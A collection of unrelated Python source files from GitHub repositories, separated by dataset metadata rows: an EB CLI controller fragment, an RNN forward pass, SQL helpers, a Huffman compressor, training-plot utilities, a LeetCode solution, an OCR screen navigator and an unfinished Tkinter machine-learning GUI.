    Meta.label = 'platform delete'
    Meta.aliases = ['delete']
    Meta.aliases_only = True
    Meta.stacked_on = 'platform'
    Meta.stacked_type = 'nested'
    Meta.usage = 'eb platform delete <version> [options...]'
class EBPDeleteController(GenericPlatformDeleteController):
    # `ebp delete` variant of the same command.
    Meta = GenericPlatformDeleteController.Meta.clone()
    Meta.label = 'delete'
    Meta.usage = 'ebp delete <version> [options...]'
| aws/aws-elastic-beanstalk-cli | ebcli/controllers/platform/delete.py | delete.py | py | 3,695 | python | en | code | 150 | github-code | 13 |
23905384621 | #!/usr/bin/env python3
"""1-rnn.py"""
import numpy as np
def rnn(rnn_cell, X, h_0):
    """Perform forward propagation for a simple RNN over all time steps.

    Args:
        rnn_cell: cell exposing forward(h_prev, x_t) -> (h_next, y_t)
            and a weight matrix Wy whose second dimension is the output
            size.
        X: input data of shape (t, m, ...) — t time steps, batch size m.
        h_0: initial hidden state of shape (m, h).

    Returns:
        H: hidden states including h_0, shape (t + 1, m, h).
        Y: per-step outputs, shape (t, m, Wy.shape[1]).
    """
    t = X.shape[0]
    m = X.shape[1]
    h = h_0.shape[1]
    H = np.zeros((t + 1, m, h))
    Y = np.zeros((t, m, rnn_cell.Wy.shape[1]))
    # Seed the initial state once instead of re-checking `i == 0`
    # inside the loop as the original did.
    H[0] = h_0
    for step in range(t):
        H[step + 1], Y[step] = rnn_cell.forward(H[step], X[step])
    return H, Y
| diego0096/holbertonschool-machine_learning | supervised_learning/0x0D-RNNs/1-rnn.py | 1-rnn.py | py | 426 | python | en | code | 0 | github-code | 13 |
def script_select_todos_idiomas(dados=None):
    """Return SQL listing every distinct language name.

    ``dados`` is unused by this query; the parameter exists so every
    script_select_* helper shares the same call signature.  Converted
    from an assigned lambda with a mutable ``{}`` default to a plain
    ``def`` with a ``None`` default.
    """
    return """
    SELECT DISTINCT nome from Idiomas;
    """


def script_select_idioma_por_nome(dados=None):
    """Return SQL selecting a language by its name.

    The caller is expected to bind ``{"nome_idioma": str}`` when
    executing the statement.
    """
    return """
    SELECT nome FROM Idiomas WHERE nome = :nome_idioma
    """


def script_select_idioma_por_canal_id(dados=None):
    """Return SQL selecting a channel's language by channel id.

    The caller is expected to bind ``{"canal_id": ...}`` when executing
    the statement.
    """
    return """
    SELECT Idiomas.nome
    FROM Idiomas
    INNER JOIN canais
    ON Idiomas.id = Canais.idioma
    WHERE canal_id = :canal_id
    """
8641224415 | # Huffman coding is used to reduce the size of the file
import heapq
import os
class BinaryTreeNode:
    """Node of a Huffman tree, ordered by character frequency for heapq."""

    def __init__(self, value, frequency):
        self.value = value          # character, or None for internal nodes
        self.frequency = frequency  # occurrence count driving heap order
        self.left = None            # child for bit "0"
        self.right = None           # child for bit "1"

    def __lt__(self, other):
        """Heap ordering: the node with the lower frequency comes first."""
        return self.frequency < other.frequency

    def __eq__(self, other):
        """Nodes compare equal when their frequencies match."""
        return self.frequency == other.frequency
class HuffmanCoding:
    """Compress a text file with Huffman coding.

    Pipeline (see compress): character frequencies -> min-heap of nodes
    -> Huffman tree -> bit codes per character -> padded bit string ->
    bytes written to a sibling .bin file.
    """

    def __init__(self, path):
        self.path = path        # path of the input text file
        self.__heap = []        # min-heap of BinaryTreeNode, keyed by frequency
        self.__codes = {}       # char -> bit-string code

    def __make_frequency_dict(self, text):
        """Count how often each character occurs in the text."""
        freq_dict = {}
        for char in text:
            if char not in freq_dict:
                freq_dict[char] = 0
            freq_dict[char] += 1
        return freq_dict

    def __buildheap(self, freq_dict):
        """Push one leaf node per character onto the min-heap."""
        for key in freq_dict:
            frequency = freq_dict[key]
            binary_tree_node = BinaryTreeNode(key, frequency)
            heapq.heappush(self.__heap, binary_tree_node)

    def __buildTree(self):
        """Merge the two lightest nodes until one root remains on the heap."""
        while((len(self.__heap))>1):
            binary_tree_node_1 = heapq.heappop(self.__heap)
            binary_tree_node_2 = heapq.heappop(self.__heap)
            freq_sum = binary_tree_node_1.frequency + binary_tree_node_2.frequency
            # Internal node: value None, children carry the characters.
            newnode = BinaryTreeNode(None, freq_sum)
            newnode.left = binary_tree_node_1
            newnode.right = binary_tree_node_2
            heapq.heappush(self.__heap, newnode)
        return

    def buildcodeshelper(self, head, curr_bits):
        """Walk the tree, assigning "0" for left and "1" for right edges."""
        if head is None:
            return
        if head.value is not None:
            # Leaf: the accumulated bit path is this character's code.
            self.__codes[head.value] = curr_bits
            return
        self.buildcodeshelper(head.left, curr_bits + "0")
        self.buildcodeshelper(head.right, curr_bits + "1")

    def __buildcodes(self):
        """Derive the code table from the finished tree (heap root)."""
        head = self.__heap[0]
        self.buildcodeshelper(head, "")

    def __getEncodedtext(self, text):
        """Translate the text into one long bit string via the code table."""
        encoded_text = ""
        for char in text:
            encoded_text += self.__codes[char]
        return encoded_text

    def __getPaddedEncodedText(self, encoded_text):
        """Pad to a byte boundary; the first byte records the pad length."""
        padded_amount = 8 - (len(encoded_text) % 8)
        for i in range(padded_amount):
            encoded_text = encoded_text + '0'
        # 8-bit header so decompression knows how many pad bits to drop.
        padded_info = "{0:08b}".format(padded_amount)
        padded_encoded_text = padded_info + encoded_text
        return padded_encoded_text

    def __getBytesArray(self, padded_encoded_text):
        """Chop the padded bit string into integer byte values."""
        array = []
        for i in range(0, len(padded_encoded_text), 8):
            byte = padded_encoded_text[i:i+8]
            array.append(int(byte, 2))
        return array

    def compress(self):
        """Compress self.path into a .bin file and return its path."""
        # get file from the path; output sits next to it with a .bin suffix
        file_name, file_extension = os.path.splitext(self.path)
        output_path = file_name + ".bin"

        # read text from file
        with open(self.path, "r+") as file, open(output_path, "wb") as output:
            text = file.read()
            text = text.rstrip()
            # make frequency dictionary from the text
            freq_dict = self.__make_frequency_dict(text)
            # construct the heap from the frequency dict
            self.__buildheap(freq_dict)
            # construct the binary tree from the heap
            self.__buildTree()
            # construct the codes from the binary tree
            self.__buildcodes()
            # creating the encoded text using the codes
            encoded_text = self.__getEncodedtext(text)
            # pad this encoded text first
            padded_encoded_text = self.__getPaddedEncodedText(encoded_text)
            # put this encoded text into the binary file
            bytes_array = self.__getBytesArray(padded_encoded_text)
            final_bytes = bytes(bytes_array)
            # write this binary file as output
            output.write(final_bytes)

        print("compressed!!")
        return output_path
# Demo: compress a hard-coded sample file.
# NOTE(review): the path is machine-specific and will fail elsewhere.
path = "/home/saket18/hello.txt"  # you can give the path of your file
h = HuffmanCoding(path)
output_path = h.compress()  # it will return the path of the output file
| codemistic/General-Projects | Python Basic Project/Huffman coding.py | Huffman coding.py | py | 3,966 | python | en | code | 47 | github-code | 13 |
8525121236 | import os
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, classification_report
from .util import *
def tr_plot(tr_data, start_epoch):
    """Plot training/validation loss and accuracy side by side.

    Args:
        tr_data: Keras History object whose .history holds 'accuracy',
            'loss', 'val_accuracy' and 'val_loss' lists.
        start_epoch: epoch offset used when training was resumed, so the
            x-axis continues from the previous run.
    """
    # Plot the training and validation data
    tacc = tr_data.history["accuracy"]
    tloss = tr_data.history["loss"]
    vacc = tr_data.history["val_accuracy"]
    vloss = tr_data.history["val_loss"]
    # Work out how many epochs were actually run
    Epoch_count = len(tacc) + start_epoch
    Epochs = [i + 1 for i in range(start_epoch, Epoch_count)]
    index_loss = np.argmin(vloss)
    val_lowest = vloss[index_loss]
    index_acc = np.argmax(vacc)
    acc_highest = vacc[index_acc]
    sc_label = 'best epoch=' + str(index_loss + 1 + start_epoch)
    vc_label = 'best epoch=' + str(index_acc + 1 + start_epoch)
    # Create the figure
    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 8))
    axes[0].plot(Epochs, tloss, 'r', label='训练损失')
    axes[0].plot(Epochs, vloss, 'g', label='验证损失')
    axes[0].scatter(index_loss + 1 + start_epoch, val_lowest, s=150, c="blue", label=sc_label)
    axes[0].set_title('训练和验证损失')
    axes[0].set_xlabel("迭代次数")
    axes[0].set_ylabel("损失")
    axes[0].legend()
    axes[1].plot(Epochs, tacc, 'r', label='训练准确率')
    axes[1].plot(Epochs, vacc, 'g', label='验证准确率')
    # BUGFIX: the best-accuracy marker was labelled with the float
    # `val_lowest`; use the prepared `vc_label` string (previously unused).
    axes[1].scatter(index_acc + 1 + start_epoch, acc_highest, s=150, c='blue', label=vc_label)
    # BUGFIX: the accuracy subplot was titled 训练和验证损失 (loss) —
    # a copy-paste slip from the left subplot.
    axes[1].set_title("训练和验证准确率")
    axes[1].set_xlabel("迭代次数")
    axes[1].set_ylabel("准确率")
    axes[1].legend()
    plt.show()
def print_info(test_gen, preds, print_code, save_dir, subject):
    """
    Report classification results for a test generator: print the worst
    misclassifications, plot per-class error counts, draw a confusion
    matrix (for <= 30 classes) and print a classification report.

    :param test_gen: test-set data generator (exposes ``class_indices``,
        ``labels`` and ``filenames`` for the images it yields)
    :param preds: per-sample prediction probability vectors
    :param print_code: max number of misclassified files to print (0 = none)
    :param save_dir: save directory (currently unused in this function)
    :param subject: dataset subject name (currently unused in this function)
    :return: None
    """
    # Class-name -> index mapping, ground-truth labels and file names.
    class_dict = test_gen.class_indices
    labels = test_gen.labels
    file_names = test_gen.filenames
    error_list = []
    true_class = []
    pred_class = []
    prob_list = []
    # Inverted mapping: index -> class name.
    new_dict = {}
    error_indies = []
    # Predicted class index for every sample.
    y_pred = []
    for key, value in class_dict.items():
        new_dict[value] = key
    classes = list(new_dict.values())
    # Count misclassified samples while collecting their details.
    errors = 0
    for i, p in enumerate(preds):
        pred_index = np.argmax(p)   # predicted class index
        true_index = labels[i]      # ground-truth class index
        if pred_index != true_index:
            error_list.append(file_names[i])
            true_class.append(new_dict[true_index])
            pred_class.append(new_dict[pred_index])
            # Probability assigned to the (wrong) predicted class.
            prob_list.append(p[pred_index])
            error_indies.append(true_index)
            errors = errors + 1
        y_pred.append(pred_index)
    if print_code != 0:
        if errors > 0:
            # Print at most `print_code` misclassified files.
            r = errors if print_code > errors else print_code
            msg = '{0:^28s}{1:^28s}{2:^28s}{3:^16s}' \
                .format('Filename', 'Predicted Class', 'True Class',
                        'Probability')
            print_in_color(msg, (0, 255, 0), (55, 65, 80))
            for i in range(r):
                # Recover a short "class_dir/file" path from the full path.
                split1 = os.path.split(error_list[i])
                split2 = os.path.split(split1[0])
                fname = split2[1] + '/' + split1[1]
                msg = '{0:^28s}{1:^28s}{2:^28s}{3:4s}{4:^6.4f}'.format(
                    fname, pred_class[i], true_class[i], ' ',
                    prob_list[i])
                print_in_color(msg, (255, 255, 255), (55, 65, 60))
        else:
            msg = '精度为100%,没有错误'
            print_in_color(msg, (0, 255, 0), (55, 65, 80))
    if errors > 0:
        plot_bar = []
        plot_class = []
        for key, value in new_dict.items():
            # Number of samples of this true class that were misclassified.
            count = error_indies.count(key)
            if count != 0:
                plot_bar.append(count)
                plot_class.append(value)
        fig = plt.figure()
        fig.set_figheight(len(plot_class) / 3)
        fig.set_figwidth(10)
        for i in range(0, len(plot_class)):
            c = plot_class[i]
            x = plot_bar[i]
            plt.barh(c, x, )
        plt.title("测试集错误分类")
    y_true = np.array(labels)
    y_pred = np.array(y_pred)
    # Only draw the confusion matrix when there are at most 30 classes.
    if len(classes) <= 30:
        cm = confusion_matrix(y_true, y_pred)
        length = len(classes)
        if length < 8:
            fig_width = 8
            fig_height = 8
        else:
            fig_width = int(length * 0.5)
            fig_height = int(length * 0.5)
        plt.figure(figsize=(fig_width, fig_height))
        # BUG FIX: np.array(length) is a 0-d scalar; pairing one tick
        # position with `length` labels makes plt.xticks/yticks raise.
        # np.arange(length) yields one tick position per class.
        plt.xticks(np.arange(length) + 0.5, classes, rotation=90)
        plt.yticks(np.arange(length) + 0.5, classes, rotation=0)
        # NOTE(review): `cm` is computed but never drawn (no imshow /
        # heatmap call) — confirm whether plt.imshow(cm) was intended.
        plt.xlabel("预测的")
        plt.ylabel("真实的")
        plt.title("混淆矩阵")
        plt.show()
    clr = classification_report(y_true, y_pred, target_names=classes)
    print("Classification Report:\n----------------------\n", clr)
def find_error_nums(nums: list[int]):
    """Return the duplicated value(s) followed by the missing value(s)
    for a list that should contain 1..len(nums) exactly once.

    For the classic LeetCode 645 input (exactly one duplicate and one
    missing number) this returns ``[duplicate, missing]``.

    Replaces the original O(n^2) ``nums.count`` scan with a single
    O(n) pass over the list.
    """
    seen = set()
    duplicates = []
    for value in nums:
        # Record each duplicated value once, in first-seen order.
        if value in seen and value not in duplicates:
            duplicates.append(value)
        seen.add(value)
    # Missing values from the expected 1..n range, ascending.
    missing = [i for i in range(1, len(nums) + 1) if i not in seen]
    return duplicates + missing
# Quick smoke checks using the LeetCode 645 examples.
print(find_error_nums([1, 2, 2, 4]))
print(find_error_nums([1, 1]))
| Dimaaap/Leetcode | Easy/645.) Set Mismatch.py | 645.) Set Mismatch.py | py | 385 | python | en | code | 0 | github-code | 13 |
28248341016 | import pyautogui
import editdistance
import pyscreenshot as ImageGrab
import win32api, win32con
from gui.wxpython_gui import WxPythonGUI
from ocr.tesseract import TesseractEngine
class Navigator:
    """Screen-text navigator: OCRs a screenshot, lets the user search the
    recognized words through a GUI overlay, and clicks the chosen match."""

    def __init__(self):
        self.current_gui = WxPythonGUI
        self.current_ocr_engine = TesseractEngine
        # Minimum Levenshtein similarity for a fuzzy match (0..1).
        self.minimum_word_similarity = 0.90
        # (word, position) tuple currently highlighted in the GUI, or None.
        self.currently_highlighted_term = None
        self.ocr_engine_instance = self.current_ocr_engine.initialize()

    def start(self):
        """Take a screenshot, OCR it, then launch the search GUI."""
        image_path = self._take_screenshot()
        self.ocr_results = self.ocr_engine_instance.get_ocr_results(image_path)
        self.gui_instance = self.current_gui.initialize()
        self.gui_instance.add_callback("search_term_change", self._search_term_changed)
        self.gui_instance.add_callback("click_term", self._click_highlighted_term)
        self.gui_instance.start()

    def _click_highlighted_term(self):
        """
        Called when user signals that they want the mouse to click the currently highlighted term.
        """
        if self.currently_highlighted_term:
            self.gui_instance.exit()
            print("Clicking: ", self.currently_highlighted_term)
            x, y = self.currently_highlighted_term[1][0:2]
            x, y = int(x), int(y)
            win32api.SetCursorPos((x, y))
            # Two press/release pairs: performs a double-click at the term
            # (same event sequence as the original code).
            for _ in range(2):
                win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, x, y, 0, 0)
                win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, x, y, 0, 0)

    def _match_term_to_results_with_levenshtein(self, current_search_term, ocr_results):
        """
        Return the OCR (word, position) pairs whose Levenshtein similarity
        to the search term exceeds ``self.minimum_word_similarity``.
        Results keep OCR (on-screen) order, so equally-similar words are
        effectively ranked by their position on screen.
        """
        possible_matches = []
        for result in ocr_results:
            ocr_result_word = result[0]
            distance = editdistance.eval(current_search_term, ocr_result_word)
            similarity = 1 - distance / max(len(ocr_result_word), len(current_search_term))
            if similarity > self.minimum_word_similarity:
                possible_matches.append(result)
        return possible_matches

    def _match_term_to_results(self, current_search_term, ocr_results):
        """
        Return the OCR (word, position) pairs that contain the search
        term as a case-insensitive substring.
        """
        # BUG FIX: only the OCR words were lowercased before, so any
        # uppercase character typed by the user could never match.
        term = current_search_term.lower()
        return [result for result in ocr_results if term in result[0].lower()]

    def _search_term_changed(self):
        """Re-run matching for the current term and update the highlight."""
        current_search_term = self.gui_instance.get_search_term()
        if not current_search_term.strip():
            return
        possible_matches_contains = self._match_term_to_results(current_search_term, self.ocr_results)
        possible_matches_lev = self._match_term_to_results_with_levenshtein(current_search_term, self.ocr_results)
        # NOTE(review): a word can appear in both lists; only the first
        # entry is used for highlighting, so duplicates are harmless here.
        possible_matches = possible_matches_contains + possible_matches_lev
        # TODO: remember current position and allow passing through different matches
        if possible_matches:
            self.currently_highlighted_term = possible_matches[0]
            self.gui_instance.highlight_term(possible_matches[0])
        else:
            self.gui_instance.remove_highlights()

    def _take_screenshot(self):
        """
        Takes a screenshot of the current screen and returns the file path.
        """
        im = ImageGrab.grab()
        im.save('crnt.png')
        return 'crnt.png'
return 'crnt.png'
if __name__ == "__main__":
    # Script entry point: capture the screen, OCR it, launch the search GUI.
    n = Navigator()
    n.start()
| avjves/TypeNavi | run.py | run.py | py | 4,223 | python | en | code | 1 | github-code | 13 |
32859057689 | import pandas as pd
import numpy as np
from tkinter import ttk
from tkinter.filedialog import *
import tkinter.scrolledtext as st
from tkinter import *
from pandas.api.types import is_string_dtype
from pandas.api.types import is_numeric_dtype
import matplotlib.pyplot as plt
from sklearn.preprocessing import OneHotEncoder, OrdinalEncoder
from sklearn.model_selection import train_test_split, GridSearchCV, StratifiedKFold
from sklearn.cluster import KMeans
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
from sklearn.naive_bayes import GaussianNB
from pandas.api.types import is_string_dtype
import matplotlib
matplotlib.use('TkAgg')
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
def interacetow(df):
global liste_of_selected_item
global liste_percentage
global liste
liste=(df.columns.values).tolist()
# ==================================================================================================
# ==================================================================================================
global list_selected
list_selected=[]
def second_window(df):
def event_btn():
if len(list_selected) != 0:
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,list_selected)
window.destroy()
else:
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END, "you have to choose input first")
def entryselected():
global list_selected
list_selected = [listNodes.get(i) for i in listNodes.curselection()]
selectedoutput.delete('1.0','100.0')
selectedoutput.insert(END, "\n")
for i in list_selected :
selectedoutput.insert(END,i)
selectedoutput.insert(END,"\n")
window = Toplevel()
window.geometry("500x450")
window.title("choose input")
frame = Frame(window, width=250, height=250, borderwidth=2, relief=GROOVE, background="gray35" )
frame.place(x=10,y=50)
label2 = Label(window, text="Input", font=("Arial Black",15), foreground="gray35")
label2.place(x=60, y=10)
label2 = Label(window, text="Input Chosen", font=("Arial Black",15), foreground="gray35")
label2.place(x=280, y=10)
v=StringVar()
listNodes = Listbox(frame,listvariable=v, width=20, height=15, font=("Helvetica", 12), selectmode=MULTIPLE)
liste =(df.columns.values).tolist()
j=1
for i in liste:
listNodes.insert(j, i)
j=j+1
listNodes.pack(side="left", fill="y")
scrollbar = Scrollbar(frame, orient="vertical")
scrollbar.config(command=listNodes.yview)
scrollbar.pack(side="right", fill="y")
listNodes.config(yscrollcommand=scrollbar.set)
canvas3 = Canvas(window, width=200, height=280, background="gray80", borderwidth=2, relief=GROOVE)
selectedoutput = st.ScrolledText(canvas3, width=27, height=18, background="white" ,font=("arial ",10))
selectedoutput.place(x=2, y=0)
canvas3.place(x=250,y=50)
bouton3 = ttk.Button(window, text="submit", width=8,command=entryselected)
bouton3.place(x=150, y=380)
bouton3 = ttk.Button(window, text="OK", width=8,command=event_btn)
bouton3.place(x=250, y=380)
window.mainloop()
# ==================================== SSVVMM ==============================================================
global kernel
global degree_liste
degree_liste=[]
global gamma_liste
gamma_liste=[]
global coef0_liste
coef0_liste=[]
global C_liste
C_liste=[]
global df_init
#==============================================================================
# =============================================================================
class Model:
def __init__(self):
self.df_init = df.copy()
self.df = df.dropna().reset_index().drop(['index'],axis=1)
self.df_cod = self.df.copy()
self.df_finale = df.copy()
self.df_Result_liste = []
self.model_liste = []
self.sc_moyenne_liste = []
self.std_liste = []
self.col_dict={}
self.date_liste=[]
self.df_test=[]
self.input=[]
"""
def Importer(self):
global liste
filename = askopenfilename(title="Ouvrir un fichier",filetypes=[('csv files','.csv'),
("Excel file","*.xlsx"),("Excel file 97-2003","*.xls")])
df = pd.read_excel(filename)
df["Index"] = [x for x in range(1, len(df.values)+1)]
df =df[ ['Index'] + [ col for col in df.columns if col != 'Index' ] ]
console.delete('4.0','100.0')
console.insert(END, "\n")
console.insert(END, "Le fichier est ouvert\n")
self.df_init = df.copy()
self.df = df.dropna().reset_index().drop(['index'],axis=1)
self.df_cod = self.df.copy()
self.df_finale = df.copy()
self.update()
"""
# ========================================================================================================
def Afficher_Table(self,df):
try:
if((df.shape[0] ==0) and (df.shape[1]==0)):
console.insert(END, "Please open a file first \n")
nb_colomns = df.shape[1]
aray = np.arange(1,nb_colomns+1)
tupl=tuple(aray)
tree = ttk.Treeview(fenetre, columns = tupl, height = 5 , show ="headings")
tree.place(x=260, y=3, width=545 , height=420)
# Add scrollbar
vsb1 = ttk.Scrollbar(fenetre , orient="vertical",command=tree.yview)
vsb1.place(x=805, y=3, height=420)
tree.configure(yscrollcommand=vsb1.set)
vsb2 = ttk.Scrollbar(fenetre , orient="horizontal",command=tree.xview)
vsb2.place(x=260, y=410, width=560)
tree.configure(yscrollcommand=vsb1.set, xscrollcommand=vsb2.set)
# Add headings
i=1
for name_attr in df.columns:
tree.heading(i, text = name_attr)
i=i+1
# Define column width
for i in range(1,nb_colomns+1):
tree.column(i, width = 80)
for index in range(0,df.shape[0]):
enrg = list(df.values[index,])
tree.insert('', END, value= enrg)
console.delete('3.0','100.0')
console.insert(END, "\n")
n1=df.shape[0]
n2=df.shape[1]
console.insert(END,"Number of lines : "+str(n1)+"\n")
console.insert(END,"Nombre of colonnes : "+str(n2)+"\n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Table is not exist yet \n")
def Codding(self):
valueDVEncode = str( DVEncode.get())
valueEncoderT = str( EncoderT.get())
col=valueDVEncode
choix=valueEncoderT
self.col_dict[col]= choix
try:
if(is_string_dtype(df[col])):
if(choix=="OneHotEncoder"):
OneHotEncoding = OneHotEncoder(handle_unknown="ignore")
a = OneHotEncoding.fit_transform(self.df[[col]]).astype(int)
liste = []
liste = [col+'_'+str(i) for i in range(self.df[col].unique().shape[0])]
other = pd.DataFrame(data=a.toarray(),columns=liste)
self.df_cod = pd.concat([self.df_cod,other],axis=1)
if(choix=="OneLabelEncoder"):
OrdinalEncoding = OrdinalEncoder()
other = OrdinalEncoding.fit_transform(self.df[[col]]).astype(int)
other = pd.DataFrame(other, columns=[col+'_'+'Num'])
self.df_cod = pd.concat([self.df_cod,other],axis=1)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the variable is successfully converted \n ")
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"variable :"+col+"\n")
parachoisir.insert(END,"encoding type :"+choix+"\n")
else:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"the variable is of type int \n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error! variable not exists \n ")
self.update()
self.Afficher_Table(self.df_cod)
        def update(self):
            """Refresh every column-selection combobox (encode variable,
            date variable, output/target, correlation target) from the
            current columns of the coded dataframe ``self.df_cod``."""
            global liste
            liste =(self.df_cod.columns.values).tolist()
            # Repopulate each Tk combobox and reset it to the first column.
            DVEncode["value"] =liste
            DVEncode.current(0)
            DateVar["value"] =liste
            DateVar.current(0)
            Output["value"] =liste
            Output.current(0)
            corrterget["value"] =liste
            corrterget.current(0)
def Transforme_DATE(self,df,df_cod,col):
liste_1 = []
liste_2 = []
liste_3 = []
from datetime import datetime
for i in range(df.shape[0]):
date = df[col].iloc[i]
y = date.year
m = date.month
d = date.day
liste_1.append(y)
liste_2.append(m)
liste_3.append(d)
y = pd.Series(liste_1)
m = pd.Series(liste_2)
d = pd.Series(liste_3)
df_date = pd.concat([y,m,d],axis=1)
df_date.columns = ['year','month','day']
df_cod = pd.concat([df_cod,df_date],axis=1)
return df_cod
def Transforme_DATE_Train(self):
try:
valueDateVar = str( DateVar.get())
col=valueDateVar
self.date_liste.append(col)
self.df_cod= self.Transforme_DATE(self.df,self.df_cod,col)
self.Afficher_Table(self.df_cod)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Date variable is successfully converted \n ")
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"Date variable :"+valueDateVar+"\n")
except:
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END," Error: variable chosen not of type Date \n ")
def Codding_Test(self,col,choix=0):
if(choix==1):
OneHotEncoding = OneHotEncoder(handle_unknown="ignore")
OneHotEncoding.fit(self.df[[col]])
a = OneHotEncoding.transform(self.df_test[[col]]).astype(int)
liste = []
liste = [col+'_'+str(i) for i in range(self.df[col].unique().shape[0])]
other = pd.DataFrame(data=a.toarray(),columns=liste)
self.df_test = pd.concat([self.df_test,other],axis=1)
if(choix==0):
OrdinalEncoding = OrdinalEncoder()
OrdinalEncoding.fit(self.df[[col]])
other = OrdinalEncoding.transform(self.df_test[[col]]).astype(int)
other = pd.DataFrame(other, columns=[col+'_'+'Num'])
self.df_test = pd.concat([self.df_test,other],axis=1)
console.insert(END, "\n")
console.insert(END,"the test variable is successfully converted \n ")
a = self.df_test[self.col_y]
self.df_test = self.df_test.drop([self.col_y],axis=1)
self.df_test[self.col_y] = a
def Transforme_DATE_Test(self,col):
self.df_test = self.Transforme_DATE(self.df_test,self.df_test,col)
console.insert(END, "\n")
console.insert(END,"the test date variable is converter with success \n ")
a = self.df_test[self.col_y]
self.df_test = self.df_test.drop([self.col_y],axis=1)
self.df_test[self.col_y] = a
def Correlation_Variable(self):
try :
Valuecorrterget=str( corrterget.get())
corr = self.df_cod.corr()[Valuecorrterget].drop([Valuecorrterget],axis=0)
x = corr.index
fig=plt.figure(2,figsize=(9,7))
fig=plt.barh(x, corr)
fig=plt.show()
canvas = FigureCanvasTkAgg(fig, master=fenetre)
canvas.get_tk_widget().pack()
canvas.draw()
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Graphical visualization of the correlation of \n variables with the variable target :"+Valuecorrterget+" \n ")
except :
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"Error !! choose Numerical Variable \n ")
def Selection_fetcher(self):
# global liste_of_selected_item
#ValueInput=str(Input.get())
global list_selected
ValueOutput=str(Output.get())
#cols_X=liste_of_selected_item
cols_X=list_selected
col_y =ValueOutput
df_test = self.df_init[self.df_init.isnull()[col_y]].reset_index().drop(['index'],axis=1)
self.df_test = df_test.drop([col_y],axis=1)
self.df_test[col_y] = df_test[col_y]
self.df_test_y = self.df_test.copy()
self.col_y = col_y
self.cols_X= list_selected
for col in self.col_dict.keys():
if(self.col_dict[col]=="OneLabelEncoder"):
self.Codding_Test(col,0)
else :
self.Codding_Test(col,1)
for col in self.date_liste:
self.Transforme_DATE_Test(col)
self.y = self.df_cod[col_y].copy()
self.X = self.df_cod[cols_X].copy()
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END, "features chosen to build the model are :\n")
parachoisir.insert(END, cols_X)
parachoisir.insert(END, "\n target est :\n")
parachoisir.insert(END, col_y)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"variables are successfully selected \n" )
def Déscritiser(self):
#try :
n_clusters=int(entree_2.get())
self.n_clusters = n_clusters
target_array = np.array(self.y).reshape(-1, 1)
k_means = KMeans(init='k-means++', n_clusters=n_clusters)
y = k_means.fit_predict(target_array)
self.target = self.y
self.y = pd.DataFrame(y,columns=['y'])
self.table = pd.concat([self.df_cod,self.y],axis=1)
self.Afficher_Table(self.table)
console.delete('3.0','100.0')
console.insert(END, "\n")
console.insert(END,"discretization is successfully completed \n" )
# Visualisation ************************************************************************************************************************
def Choix_Parametre_listes(self):
global liste_percentage
name=str(ModelT.get())
self.algorithme_att = name
pourc_liste=liste_percentage
pourc_liste = np.array(pourc_liste)
parachoisir.delete('3.0','100.0')
parachoisir.insert(END, "\n")
parachoisir.insert(END,"choosen Model :"+ name +"\n")
parachoisir.insert(END,"pourcentage % : ")
parachoisir.insert(END,pourc_liste)
pourc_liste=[i/100 for i in pourc_liste]
self.pc_liste_att =pourc_liste
if(self.algorithme_att=='svm'):
# kernel, degree_liste, gamma_liste, coef0_liste, C_liste = parametre_svm()
kernel='rbf'
self.kernel = kernel
self.kernel = kernel
degree_liste = [3]
coef0_liste = [0]
gamma_liste = [0.1,0.01,0.001,'scale']
C_liste = [1]
if(kernel=='rbf'):
param_dict = {'gamma': gamma_liste, 'C': C_liste}
if(kernel=='poly'):
param_dict = {'degree': degree_liste, 'coef0': coef0_liste, 'C': C_liste}
if(kernel=='sigmoid'):
param_dict = {'gamma': gamma_liste, 'coef0': coef0_liste, 'C': C_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = svm.SVC(kernel=kernel, gamma='scale')
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='DecisionTree'):
#max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_DecisionTree()
max_depth_liste = [1,2,3]
min_samples_leaf_liste = [1,2,3]
min_samples_split_liste = [2,3]
param_dict = {'max_depth': max_depth_liste, 'min_samples_leaf': min_samples_leaf_liste, 'min_samples_split': min_samples_split_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = DecisionTreeClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='KNeighbors'):
#n_neighbors_liste, p_liste, weights_liste = parametre_KNeighbors()
n_neighbors_liste = [4,5]
p_liste = [1,2]
weights_liste = ['uniform']
param_dict = {'n_neighbors': n_neighbors_liste, 'p': p_liste, 'weights': weights_liste}
param_dict = {'n_neighbors': n_neighbors_liste, 'p': p_liste, 'weights': weights_liste}
cv = StratifiedKFold(n_splits=5, random_state=0, shuffle=True)
model = KNeighborsClassifier()
self.grid_model = GridSearchCV(estimator=model, param_grid=param_dict, cv=cv)
if(self.algorithme_att=='RandomForest'):
#n_estimators, max_depth_liste, min_samples_leaf_liste, min_samples_split_liste = parametre_RandomForest()
n_estimators_liste = [100]
max_depth_liste = [None,1,2,3]
